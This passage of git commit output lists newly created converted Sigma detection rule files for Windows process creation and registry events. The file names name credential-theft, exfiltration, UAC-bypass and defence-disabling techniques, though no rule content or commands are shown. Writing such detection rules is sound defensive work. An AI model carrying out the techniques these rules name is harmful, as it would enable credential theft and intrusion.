tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_system_exe_anomaly.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_system_user_anomaly.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_sysvol_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_task_folder_evasion.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_use_of_te_bin.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_userinit_child.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_whoami_as_param.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_susp_workfolders.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_eula_accepted.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_livekd_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_procdump.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_psexec_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_psexesvc.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_psloglist.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_psservice.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml 
create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_sysprep_appdata.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_systeminfo_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_takeown_recursive_own.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_tapinstall_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_tar_compression.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_tar_extraction.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_taskkill_sep.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_tasklist_basic_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_taskmgr_localsystem.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_taskmgr_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_tscon_localsystem.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_tscon_rdp_redirect.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_cmstp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_dismhost.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_fodhelper.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_ieinstal.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_sdclt.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_trustedpath.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_wmp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_wsreset.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ultravnc_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_vaultcmd_list_creds.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_verclsid_runs_com.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_virtualbox_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_vscode_tunnel_execution.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_vscode_tunnel_service_install.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_w32tm.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wab_unusual_parents.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wbadmin_delete_systemstatebackup.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_webdav_lnk_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_webshell_chopper.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_webshell_hacking.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_webshell_tool_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wermgr_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wermgr_susp_exec_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wget_download_direct_ip.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_where_browser_data_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_whoami_all_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_whoami_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_whoami_groups_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_whoami_output.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_whoami_parent_anomaly.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_whoami_priv_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_windows_terminal_susp_children.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_winget_add_custom_source.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_winget_add_susp_custom_source.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_winget_local_install_via_manifest.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_winrar_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_winrm_awl_bypass.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_winrm_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_winzip_password_compression.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_namespace_defender.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_process_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_recon_computersystem.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_recon_csproduct.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_recon_group.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_recon_hotfix.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_recon_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_recon_product.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_recon_product_class.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_recon_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_remote_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_service_manipulation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_susp_process_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_terminate_application.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_uninstall_application.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_uninstall_security_products.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_xsl_script_processing.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmiprvse_spawning_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wpbbin_potential_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wscript_cscript_script_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wsl_lolbin_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wuauclt_dll_loading.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wusa_cab_files_extraction.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wusa_susp_parent_execution.yml create mode 100644 
tools/sigmac/converted_rules/builtin/registry/registry_add/registry_add_malware_netwire.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_add/registry_add_malware_ursnif.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_add/registry_add_persistence_amsi_providers.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_add/registry_add_persistence_com_key_linking.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_add_local_hidden_user.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_apt_leviathan.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_apt_oceanlotus_registry.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_apt_oilrig_mar18.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_apt_pandemic.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_bypass_via_wsreset.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_cmstp_execution_by_registry.yml create mode 100644 
tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_hack_wce_reg.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_mal_azorult.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_mal_flowcloud.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_malware_qakbot_registry.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_mimikatz_printernightmare.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_modify_screensaver_binary_path.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_narrator_feedback_persistance.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_net_ntlm_downgrade.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_office_test_regadd.yml create mode 100644 
tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_office_trust_record_modification.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_persistence_recycle_bin.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_portproxy_registry_key.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_redmimicry_winnti_reg.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_runkey_winekey.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_runonce_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_shell_open_keys_manipulation.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_silentprocessexit_lsass.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_ssp_added_lsa_config.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_stickykey_like_backdoor.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_susp_atbroker_change.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_susp_download_run_key.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_susp_lsass_dll_load.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_susp_mic_cam_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_set_enable_anonymous_connection.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml create mode 100644 
tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_add_port_monitor.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_aedebug_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_amsi_com_hijack.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml create mode 100644 
tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_bginfo_custom_db.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_bginfo_custom_vbscript.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_blackbyte_ransomware.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_change_rdp_port.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_change_security_zones.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_change_winevt_channelaccess.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_chrome_extension.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_clickonce_trust_prompt.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_cobaltstrike_service_installs.yml create mode 100644 
tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_comhijack_sdclt.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_crashdump_disabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_creation_service_susp_folder.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_creation_service_uncommon_folder.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_custom_file_open_handler_powershell_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_defender_exclusions.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_desktop_background_change.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_dhcp_calloutdll.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disable_administrative_share.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disable_autologger_sessions.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disable_defender_firewall.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disable_function_user.yml create mode 100644 
tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disable_macroruntimescanscope.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disable_privacy_settings_experience.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disable_security_center_notifications.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disable_system_restore.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disable_uac_registry.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disable_windows_defender_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disable_windows_firewall.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disable_winevt_logging.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disabled_pua_protection_on_microsoft_defender.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disallowrun_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_dns_over_https_enabled.yml create mode 100644 
tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_dot_net_etw_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_enabling_turnoffcheck.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_evtx_file_key_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_fax_change_service_user.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_fax_dll_persistance.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_file_association_exefile.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_hangs_debugger_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_hhctrl_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_hidden_extention.yml create mode 100644 